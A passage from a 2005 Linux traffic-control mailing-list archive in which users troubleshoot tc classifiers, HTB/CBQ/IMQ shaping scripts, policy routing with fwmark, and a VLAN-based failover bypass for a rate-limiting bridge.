lot of small issues, adds action capabilities to all classifiers, and extends tcindex and route classifier to be changeable during runtime. If problem remains, goto to 2. 2) Provided detailed information about how your police configuration looks like, wehther you are using CONFIG_NET_CLS_ACT, etc. so I can fix it. > The only difference between working and not working cases when using tc > -s qdisc ls dev eth0 is the drops count. The stats are OK apart from that. And it is definitely classifier specific to fw? From andy.furniss@dsl.pipex.com Thu Jan 6 13:27:24 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 13:27:24 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050106095009.GU26856@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> Message-ID: <41DD3CBC.1010108@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00 > >>I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and >>it is the same. > > > 2 options: > 1) get latest -bk snapshot and apply http://people.suug.ch/~tgr/patches/pending/ > The patchset fixes a lot of small issues, adds action capabilities to > all classifiers, and extends tcindex and route classifier to be changeable > during runtime. If problem remains, goto to 2. Could take some time - I don't have bitkeeper and will have to find some disk space. I'll try soon(ish). > 2) Provided detailed information about how your police configuration > looks like, wehther you are using CONFIG_NET_CLS_ACT, etc. so I can fix it. I just tried some variations - but get an error - I am using new tc and get RTNETLINK answers: Invalid argument We have an error talking to the kernel with the last 2 - see below. > > >>The only difference between working and not working cases when using tc >>-s qdisc ls dev eth0 is the drops count. The stats are OK apart from that. > > > And it is definitely classifier specific to fw? I don't know what should I test with :-) tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 Works OK. tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 Doesn't work even on 2.4 that fw test works on. [andy@amd ~]$ grep NET_CLS /boot/config-lfs-5.1-2.4.26 CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m CONFIG_NET_CLS_POLICE=y Is the 2.4 that's OK. [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10 CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_NET_CLS_IND is not set CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m CONFIG_NET_CLS_ACT=y Is the fail on fw but work on ip src 0.0.0.0/0 Below are the ones that throw an error when I tc filter add (anything) tc qdisc add dev eth0 handle ffff: ingress is OK [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-2 CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_NET_CLS_IND is not set CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m # CONFIG_NET_CLS_ACT is not set CONFIG_NET_CLS_POLICE=y [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3 CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_NET_CLS_IND is not set CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m CONFIG_NET_CLS_ACT=y CONFIG_NET_CLS_POLICE=y From andy.furniss@dsl.pipex.com Thu Jan 6 13:51:05 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 13:51:05 +0000 Subject: [LARTC] Shaping the sum of incoming and outgoing traffic In-Reply-To: References: Message-ID: <41DD4249.4070305@dsl.pipex.com> Jan Rovner wrote: > Hello, > > does anyone have a working solution for the shaping both incoming and > outgoing traffic in such > way, that for a given client the *sum* of incoming and outgoing traffic > is somehow defined? > > My ISP does the same thing, it gives me just a line of a defined rate, > no matter the traffic > direction (i.e. here is your line, the clock speed is 1024kbps, do what > you want). > > I'm a litte bit familiar with HTB, my download shaping works fine. > However, I would like shape > both incoming+outgoing traffic in a way that the sum of actual outgoing > and incoming rates > of all my clients would be always below the ISP's line speed in order to > shaping get working. > > In other words, I would like to split the ISP's line into a bunch of > hierarchical "virtual" lines > with traffic borrowing etc. like HTB does for download, but with defined > *total* rates (i.e. dear > customer, here is your 128kbps line, do what you want). > > What can I do with HTB is to shape incoming and traffic separately > (somehow to virtually split > the line for upload/download with limited speeds), but this is not the > way I would like it to be, since > would like to get the line used as effective as possible. > > Maybe something like IMQ would work, but unfortunately I have found no > example for > that solution. > > Any ideas? > > Jan Rovner I did this as a proof of concept a while ago, but never finished it. It works but I didn't prioritise empty acks so testing both ways with TCP will fall apart - but then it does on a full duplex connection. Remember it's a test and I can't even remember the detail so you will need to modify alot - INPUT/OUTPUT etc for real world. Andy. #set -x IPTABLES=/usr/local/sbin/iptables MODPROBE=/sbin/modprobe IP=/usr/sbin/ip TC=/usr/sbin/tc $IPTABLES -t mangle -D INPUT -i eth0 -j MARK --set-mark 1 &> /dev/null $IPTABLES -t mangle -D OUTPUT -o eth0 -j MARK --set-mark 2 &> /dev/null $IPTABLES -t mangle -D POSTROUTING -m mark --mark 1 -j IMQ --todev 0 &> /dev/null $IPTABLES -t mangle -D POSTROUTING -m mark --mark 2 -j IMQ --todev 0 &> /dev/null $IP link set imq0 down &> /dev/null $MODPROBE -r imq &> /dev/null if [ "$1" = "stop" ] then echo "stopping" exit fi $MODPROBE imq numdevs=1 $IPTABLES -t mangle -I INPUT -i eth0 -j MARK --set-mark 1 $IPTABLES -t mangle -I OUTPUT -o eth0 -j MARK --set-mark 2 $IPTABLES -t mangle -I POSTROUTING -m mark --mark 1 -j IMQ --todev 0 $IPTABLES -t mangle -I POSTROUTING -m mark --mark 2 -j IMQ --todev 0 $IP link set imq0 up $TC qdisc add dev imq0 root handle 1:0 htb default 0 $TC class add dev imq0 parent 1:0 classid 1:1 htb rate 128kbit ceil 128kbit burst 2k #### down #### $TC class add dev imq0 parent 1:1 classid 1:10 htb rate 64kbit ceil 128kbit $TC filter add dev imq0 parent 1:0 prio 1 protocol ip handle 1 fw flowid 1:10 #### up #### $TC class add dev imq0 parent 1:1 classid 1:20 htb rate 64kbit ceil 128kbit $TC filter add dev imq0 parent 1:0 prio 1 protocol ip handle 2 fw flowid 1:20 From util@deuroconsult.ro Thu Jan 6 13:58:40 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Thu, 6 Jan 2005 15:58:40 +0200 (EET) Subject: [LARTC] Shaping the sum of incoming and outgoing traffic In-Reply-To: References: Message-ID: > Hello, Hello! See also http://www.docum.org/docum.org/faq/cache/69.html I cannot found one example on the new but maybe you have time to figure out how it works. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From andre.correa@pobox.com Thu Jan 6 14:54:24 2005 From: andre.correa@pobox.com (Andre Correa) Date: Thu, 06 Jan 2005 12:54:24 -0200 Subject: [LARTC] Strange filter behavior In-Reply-To: <200410121632.38611.alg0@iit.demokritos.gr> References: <200410121632.38611.alg0@iit.demokritos.gr> Message-ID: <41DD5120.9030209@pobox.com> This is a multi-part message in MIME format. --------------030800020308080809050109 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi list, I'm in trouble with a scenario and would like to know if you guys can help me explain and work it out: I need to put some customers in a class of, lets say, 1Mbit/s and try to garantee then a percentage of the bandwith. So I came up with the following scenario # root stuff tc qdisc add dev eth0 root handle 1: htb default 2 tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit # default class tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit # root class for this "garanteed bandwidth" service tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit # class for this 1Mbit shared bandwidth tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit # qdisc used to _make my life easier numbering customer classes_ tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250 # default class for this second qdisc tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit # each customer gets the following class and filter tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst xxx.xxx.xxx.xxx/yy flowid 1024:1 # another customer... tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst www.www.www.www/zzz flowid 1024:2 First, this filters doesn't work, all traffic goes to 1:2. Why? I can filter traffic to any class at 1:? but not to classes below the second qdisc (1:1024). Shouldn't I make this filter pointing to 1024: as the parent? It doesn't let me do it... Any help? Tks for you help and attention. ADC --------------030800020308080809050109 Content-Type: text/x-vcard; charset=utf8; name="andre.correa.vcf" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="andre.correa.vcf" begin:vcard fn:Andre Correa n:Correa;Andre adr:;;;Sao Paulo;SP;;Brazil email;internet:andre.correa@pobox.com tel;fax:+1 503 907-8907 tel;cell:+55 11 9187-1906 x-mozilla-html:FALSE version:2.1 end:vcard --------------030800020308080809050109-- From msuzen@kibris.net Thu Jan 6 15:33:01 2005 From: msuzen@kibris.net (Mehmet Ali Suzen) Date: Thu, 6 Jan 2005 17:33:01 +0200 (EET) Subject: [LARTC] tc and ntop inconsistent data flow Message-ID: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> Dear List, Sorry for the dublicated email but I couldn't get any answer. I am trying to limit some IP blocs with tc with following three step. # interface tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit # class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \ allot 1500 prio 5 bounded isolated # rules # download tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip dst 10.0.1.0/24 flowid 1:1 # upload tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip src 10.0.1.0/24 flowid 1:1 Problem is when I try to measure traffic with ntop (www.ntop.org), it is seen that overall traffic which that ip block limited to is much higher then 64kbit, actually it is about 500Kbps which signifies that tc do not limit properly. What could be the reason of this inconsistancy? How could I limit 64 Kbps? Is the above configuration correct? Many thanks for any kind of comment why it is different? -Mehmet PS: tc -s class show dev eth0 shows that I got the following [root@nat root]# /usr/local/sbin/traffic-limit.sh status class cbq 1: root rate 168Kbit (bounded,isolated) prio no-transmit Sent 6068639 bytes 5841 pkts (dropped 0, overlimits 0) borrowed 0 overactions 0 avgidle 38094 undertime 0 class cbq 1:1 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 1460691 bytes 3174 pkts (dropped 0, overlimits 12339) borrowed 0 overactions 1372 avgidle -115477 undertime -33146 class cbq 1:2 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 2336291 bytes 3192 pkts (dropped 0, overlimits 32606) borrowed 0 overactions 2376 avgidle 38094 undertime 0 class cbq 1:3 parent 1: rate 84Kbit (bounded,isolated) prio 5 Sent 3125820 bytes 4851 pkts (dropped 0, overlimits 1053) borrowed 0 overactions 521 avgidle 2631 undertime 0 class cbq 1:4 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 217663 bytes 496 pkts (dropped 0, overlimits 3553) borrowed 0 overactions 363 avgidle -195655 undertime -8.22928e+08 From tgraf@suug.ch Thu Jan 6 16:45:53 2005 From: tgraf@suug.ch (Thomas Graf) Date: Thu, 6 Jan 2005 17:45:53 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DD3CBC.1010108@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> Message-ID: <20050106164553.GV26856@postel.suug.ch> * Andy Furniss <41DD3CBC.1010108@dsl.pipex.com> 2005-01-06 13:27 > Thomas Graf wrote: > >* Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00 > > > >>I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and > >>it is the same. > > > > > >2 options: > > 1) get latest -bk snapshot and apply > > http://people.suug.ch/~tgr/patches/pending/ > > The patchset fixes a lot of small issues, adds action capabilities to > > all classifiers, and extends tcindex and route classifier to be > > changeable > > during runtime. If problem remains, goto to 2. > > Could take some time - I don't have bitkeeper and will have to find some > disk space. I'll try soon(ish). You don't need bitkeeper, just download the .10 and the latest patch to get to -bk8 then apply my patches. > tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src > 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 > > Works OK. > > tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src > 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 Use a different prio, one that is not yet occupied by a protocol/kind tuple. > [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10 > CONFIG_NET_CLS=y > CONFIG_NET_CLS_TCINDEX=m > CONFIG_NET_CLS_ROUTE4=m > CONFIG_NET_CLS_ROUTE=y > CONFIG_NET_CLS_FW=m > CONFIG_NET_CLS_U32=m > # CONFIG_NET_CLS_IND is not set > CONFIG_NET_CLS_RSVP=m > CONFIG_NET_CLS_RSVP6=m > CONFIG_NET_CLS_ACT=y CONFIG_NET_CLS_ACT_POLICE? > [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-2 > CONFIG_NET_CLS=y > CONFIG_NET_CLS_TCINDEX=m > CONFIG_NET_CLS_ROUTE4=m > CONFIG_NET_CLS_ROUTE=y > CONFIG_NET_CLS_FW=m > CONFIG_NET_CLS_U32=m > # CONFIG_NET_CLS_IND is not set > CONFIG_NET_CLS_RSVP=m > CONFIG_NET_CLS_RSVP6=m > # CONFIG_NET_CLS_ACT is not set > CONFIG_NET_CLS_POLICE=y > > [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3 > CONFIG_NET_CLS=y > CONFIG_NET_CLS_TCINDEX=m > CONFIG_NET_CLS_ROUTE4=m > CONFIG_NET_CLS_ROUTE=y > CONFIG_NET_CLS_FW=m > CONFIG_NET_CLS_U32=m > # CONFIG_NET_CLS_IND is not set > CONFIG_NET_CLS_RSVP=m > CONFIG_NET_CLS_RSVP6=m Gonna look at this, do you preload the modules and if not, do you have the correct modutils version etc? > CONFIG_NET_CLS_ACT=y > CONFIG_NET_CLS_POLICE=y This is not valid and has been fixed in bk. From payal-lartc@scriptkitchen.com Thu Jan 6 16:55:32 2005 From: payal-lartc@scriptkitchen.com (Payal Rathod) Date: Thu, 6 Jan 2005 11:55:32 -0500 Subject: [LARTC] routing decisions Message-ID: <20050106165532.GA12737@tranquility.scriptkitchen.com> Hi, I have Mandrake 10.0 gateway with internet via. ppp0. Also, another machine 192.168.0.4 is always connected to net via. a dial-up modem. Now I want to allow a machine (192.168.0.2) in my LAN to access net through 192.168.0.4. So according to lartc howto I did, # echo 200 John >> /etc/iproute2/rt_tables # ip rule add from 192.168.0.2 table John # ip route add default via 192.168.0.4 dev eth0 table John # ip route flush cache But still 192.168.0.2 cannot access internet. tracert shows that the traffic is coming to my Linux gateway and then going nowhere. I have not changed anything in 192.168.0.2 What steps am I missing? Waiting eagerly for any help on this. With warm regards, -Payal From imipak@yahoo.com Thu Jan 6 17:30:48 2005 From: imipak@yahoo.com (Jonathan Day) Date: Thu, 6 Jan 2005 09:30:48 -0800 (PST) Subject: [LARTC] routing decisions In-Reply-To: <20050106165532.GA12737@tranquility.scriptkitchen.com> Message-ID: <20050106173048.31999.qmail@web12302.mail.yahoo.com> Is packet forwarding enabled on the box you're using as a gateway? --- Payal Rathod wrote: > Hi, > I have Mandrake 10.0 gateway with internet via. > ppp0. Also, another > machine 192.168.0.4 is always connected to net via. > a dial-up > modem. Now I want to allow a machine (192.168.0.2) > in my LAN to > access net through 192.168.0.4. So according to > lartc howto I did, > # echo 200 John >> /etc/iproute2/rt_tables > # ip rule add from 192.168.0.2 table John > # ip route add default via 192.168.0.4 dev eth0 > table John > # ip route flush cache > > But still 192.168.0.2 cannot access internet. > tracert shows that > the traffic is coming to my Linux gateway and then > going nowhere. > I have not changed anything in 192.168.0.2 > > What steps am I missing? > > Waiting eagerly for any help on this. > With warm regards, > -Payal > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Meet the all-new My Yahoo! - Try it today! http://my.yahoo.com From payal-lartc@scriptkitchen.com Thu Jan 6 17:40:59 2005 From: payal-lartc@scriptkitchen.com (Payal Rathod) Date: Thu, 6 Jan 2005 12:40:59 -0500 Subject: [LARTC] routing decisions In-Reply-To: <20050106173048.31999.qmail@web12302.mail.yahoo.com> References: <20050106165532.GA12737@tranquility.scriptkitchen.com> <20050106173048.31999.qmail@web12302.mail.yahoo.com> Message-ID: <20050106174059.GA13890@tranquility.scriptkitchen.com> On Thu, Jan 06, 2005 at 09:30:48AM -0800, Jonathan Day wrote: > Is packet forwarding enabled on the box you're using > as a gateway? Ofcourse, because if I delete the default route using route command and add 192.168.0.4 as default route I can reach the internet. -Payal From stef.coene@docum.org Thu Jan 6 19:28:16 2005 From: stef.coene@docum.org (Stef Coene) Date: Thu, 6 Jan 2005 20:28:16 +0100 Subject: [LARTC] tc and ntop inconsistent data flow In-Reply-To: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> Message-ID: <200501062028.16256.stef.coene@docum.org> On Thursday 06 January 2005 16:33, Mehmet Ali Suzen wrote: > Dear List, > Sorry for the dublicated email but I couldn't get any answer. > > I am trying to limit some IP blocs with tc with following three step. > > # interface > tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit # > class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \ > allot 1500 prio 5 bounded isolated > # rules > # download > tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ > match ip dst 10.0.1.0/24 flowid 1:1 > # upload > tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ > match ip src 10.0.1.0/24 flowid 1:1 > > > Problem is when I try to measure traffic with ntop (www.ntop.org), it is > seen that overall traffic which that ip block limited to is > much higher then 64kbit, actually it is about 500Kbps which > signifies that tc do not limit properly. What could be the reason > of this inconsistancy? How could I limit 64 Kbps? Is the above > configuration correct? Remove the isolated parameter and try it again. I have some working cbq scripts on http://docum.org on the test pages. Stef From MKrauss@hitchhiker.com Thu Jan 6 20:11:43 2005 From: MKrauss@hitchhiker.com (Matthias Krauss) Date: Thu, 6 Jan 2005 21:11:43 +0100 Subject: [LARTC] iproute with iptables/mangle Message-ID: Hi List, i have a realy strange problem with no solution yet, i'm using iproute together with the iptables mangle option, in a dmz network is a cisco pix present with another inet link behind, therefore i'm using the mangle option to split traffic on a protocol base like: iptables -A PREROUTING -t mangle -i eth1 -s 192.168.1.5 -p tcp --dport 80 -j MARK --set-mark 3 and add the rule with: ip rule add fwmark 3 table 10 and add the default route to the pix: ip route add default via 192.168.2.254 dev eth2 table 10 This is working fine so far, now comes the problem, i got another network with a lancom dsl router where another inet link is behind, im using the same mangle and iproute options like iptables -A PREROUTING -t mangle -i eth1 -s 192.168.1.6 -p tcp --dport 80 -j MARK --set-mark 4 and add the rule with: ip rule add fwmark 4 table 20 and add the default route to the dsl router: ip route add default via 192.168.3.254 dev eth3 table 20 This doesnt work anymore, a tcpdump shows: tcpdump src host 192.168.1.6 or dst host 192.168.1.6 -e -i eth3 tcpdump: listening on eth3 18:19:15.444110 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1184 > 66.102.9.104.www: S 1459260866:1459260866(0) win 65535 (DF) 18:19:15.514463 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 60: 66.102.9.104.www > 192.168.1.6.1184: S 2669725313:2669725313(0) ack 1459260867 win 8190 18:19:18.459396 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1184 > 66.102.9.104.www: S 1459260866:1459260866(0) win 65535 Turning the mangle option off and modify the rule to iproute rule add from 192.168.1.6 table 20 works well, tcpump shows then: tcpdump src host 10.0.1.62 or dst host 10.0.1.62 -e -i eth3 tcpdump: listening on eth3 18:36:05.914468 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1191 > 66.102.9.104.www: S 2339385470:2339385470(0) win 65535 (DF) 18:36:05.985144 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 60: 66.102.9.104.www > 192.168.1.6: S 558741672:558741672(0) ack 2339385471 win 8190 18:36:05.985440 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 54: 192.168.1.6.1191 > 66.102.9.104.www: . ack 1 win 65535 (DF) 18:36:05.985617 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 358: 192.168.1.6.1191 > 66.102.9.104.www: P 1:305(304) ack 1 win 65535 (DF) 18:36:06.075635 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 1454: 66.102.9.104.www > 192.168.1.6.1191: . 1:1401(1400) ack 305 win 7504 [tos 0x10] 18:36:06.076339 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 320: 66.102.9.104.www > 192.168.1.6.1191: P 1401:1667(266) ack 305 win 7504 [tos 0x10] 18:36:06.076653 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 54: 192.168.1.6.1191 > Does anybody have a idea what this could be ? thx Matt From jlaraujo@mercs.homeip.net Thu Jan 6 22:16:42 2005 From: jlaraujo@mercs.homeip.net (Jose Luis Araujo) Date: Thu, 06 Jan 2005 22:16:42 +0000 Subject: [LARTC] failover strategies - failing open vs. failing closed. In-Reply-To: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu> References: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu> Message-ID: <41DDB8CA.2050000@mercs.homeip.net> Hi. Sorry for the delay. Hope you are still interested in the idea. Kelly Jeglum wrote: >I'd like to setup a box with 2 NICs as a firewall which will also rate >limits outbound traffic. What happens when/if that box hangs or is >rebooted? > =20 > If you are doing NAT or routing, the you need to use VRRPD with two=20 machines. >I'd like a solution that when there is a failure, traffic can still go >through the box even though the firewall and rate limiting functions wil= l no >longer be in effect. =20 > =20 > If on the other hand you want just the rate limiting, then you can try=20 something. It only has a drawback, the switch that you will use must=20 have Vlan and STP. The trick is this, you choose three ports, and assign those to, say vlan = 2, then choose another 3 ports and assign those to vlan 3. Enable STP on both Vlan's, increase the portcost on one port on each=20 Vlan, and use a crossed cable to link them. Connect a port from each Vlan to the bridge/rate limiter. Connect the remaining port to your inner router, and to your outer router= =2E Now, the idea is, the Vlan will divide the switch virtually, traffic=20 from vlan 2 won't go to vlan 3, only if they are physically connected,=20 they behave like two switches (witch will also work, provided that the=20 switches permit VTP). When everything is working properly, the switch=20 will see two links from vlan 2 to vlan 3 and will disable the one with=20 the higher cost (the cross cable), then all your traffic will flow=20 thought the bridge. If the bridge stops,hangs is disconnected, the switch will only see one=20 link (the cross cable) and will enable it, bypassing the bridge. I have this setup in operation now, and it works great. For those wondering, it is using a cisco 2900XL and the fallback time is = from 30 to 50 seconds. Hope it helps Jos=E9 Ara=FAjo From andy.furniss@dsl.pipex.com Thu Jan 6 23:23:04 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 23:23:04 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050106164553.GV26856@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> Message-ID: <41DDC858.6010908@dsl.pipex.com> Thomas Graf wrote: > You don't need bitkeeper, just download the .10 and the latest patch to > get to -bk8 then apply my patches. > > >>tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src >>0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 >> >>Works OK. >> >>tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src >>0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1 > > > Use a different prio, one that is not yet occupied by a protocol/kind > tuple. OK will try. > > CONFIG_NET_CLS_ACT_POLICE? I can't find it! neither can grep .config This could be it. I just deleted everything to do with 2.6.10, booted into 2.6.9 to start again with fresh 2.6.10 source tree. When I do make menuconfig I notice it uses defaults from /boot/config-2.6.9 (I will remove and try again later). So maybe this is why I can't find CONFIG_NET_CLS_ACT_POLICE ? >>[andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3 >>CONFIG_NET_CLS=y >>CONFIG_NET_CLS_TCINDEX=m >>CONFIG_NET_CLS_ROUTE4=m >>CONFIG_NET_CLS_ROUTE=y >>CONFIG_NET_CLS_FW=m >>CONFIG_NET_CLS_U32=m >># CONFIG_NET_CLS_IND is not set >>CONFIG_NET_CLS_RSVP=m >>CONFIG_NET_CLS_RSVP6=m > > > Gonna look at this, do you preload the modules and if not, do you have > the correct modutils version etc? Sorry - don't waste your time - I goofed my bzImage / GRUB naming so I was loading the first one I did all along. Andy. From tgraf@suug.ch Thu Jan 6 23:25:13 2005 From: tgraf@suug.ch (Thomas Graf) Date: Fri, 7 Jan 2005 00:25:13 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DDC858.6010908@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> Message-ID: <20050106232513.GX26856@postel.suug.ch> * Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23 > >CONFIG_NET_CLS_ACT_POLICE? > > I can't find it! neither can grep .config Sorry, it's called CONFIG_NET_ACT_POLICE From andy.furniss@dsl.pipex.com Thu Jan 6 23:35:37 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 06 Jan 2005 23:35:37 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050106232513.GX26856@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> Message-ID: <41DDCB49.6020105@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23 > >>>CONFIG_NET_CLS_ACT_POLICE? >> >>I can't find it! neither can grep .config > > > Sorry, it's called CONFIG_NET_ACT_POLICE > OK - will be booting back into LFS to try soon. Andy. From Tanasescu Mihai Thu Jan 6 23:52:15 2005 From: Tanasescu Mihai (Tanasescu Mihai) Date: Fri, 7 Jan 2005 01:52:15 +0200 Subject: [LARTC] Wierd traceroute/routing problem Message-ID: Hello, I'm having a very strange problem concerning traceroute and routing and didn't know if lartc or netfilter would be the correct choice for asking. (so sorry if my question is misplaced) I have the following setup: public ip -- gw1 -- 172.16.0.1 --- 172.16.0.2/and public ip's --- gw2 --- switch --users (public and private ip addresses; ip-user-pub) from the internet: Traceroute to a ip-user-pub shows: public ip gw1 --> 172.16.0.2 --> ip-user-pub I tried using SNAT on gw2 so that instead of 172.16.0.2 I would get one of the public ip addresses I have on gw2. It seems that packets with ttl time exceeded in transit get through to the mangle table in POSTROUTING but no longer reach the nat table in POSTROUTING (so they no longer get SNATed). The same thing happens to these kind of icmp packets if I try to SNAT them on gw1. Tcpdump just shows me 172.16.0.2 each time, exitting the public interfaces and the nat rule counter does not increase.. I also tried marking packets in mangle table and then seeing if that same mark reaches the nat table (both done in POSTROUTING) and saw that my mark no longer gets to the nat table. Any ideea what's causing this ? Or how can I make it so that instead of 172.16.0.2 I would get one of gw2's public ip's ? From andy.furniss@dsl.pipex.com Fri Jan 7 02:45:28 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Fri, 07 Jan 2005 02:45:28 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DDCB49.6020105@dsl.pipex.com> References: 